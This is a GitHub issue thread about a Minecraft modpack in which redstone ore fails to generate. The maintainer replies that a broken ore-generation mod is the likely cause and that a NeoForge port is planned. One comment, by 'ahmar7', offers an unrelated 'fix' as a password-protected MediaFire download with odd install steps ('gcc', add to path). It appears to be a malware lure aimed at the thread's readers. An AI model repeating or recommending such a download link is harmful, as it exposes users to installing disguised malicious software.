### ISSUE TITLE
[BUG] [NO REDSTONE ORE]

### ISSUE THREAD

**Issue by Wedisshow** [Ninezel/TheWanderers#11]
No matter where I've looked in the world, I just can't find redstone. I've mined between y level 0 and 35 and never came across 1 single redstone ore. Only redstone I have is 2 pieces I found in a chest.

Is this supposed to happen?

**Comment by Wedisshow** [comment]
This is the perfect modpack for me. I don't want to stop playing because of 1 issue. If there is a way to fix it, please tell me.

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Ninezel** [comment]
> This is the perfect modpack for me. I don't want to stop playing because of 1 issue. If there is a way to fix it, please tell me.

Sorry for the late response. This modpack is currently in development to be moved on to NeoForge.

I believe there is an error in the ore generation which something is overriding. So there is a mod that probably broke somewhere in ore generation that errored the redstone generation.

I am trying to get an update done to move everything to neoforge and add some custom mods. This modpack will have the same amount of mods but with a lot more optimisations. For the long run I will be adding custom mods that is only "The Wanderers" exclusive. Thank you for downloading and playing my modpack.
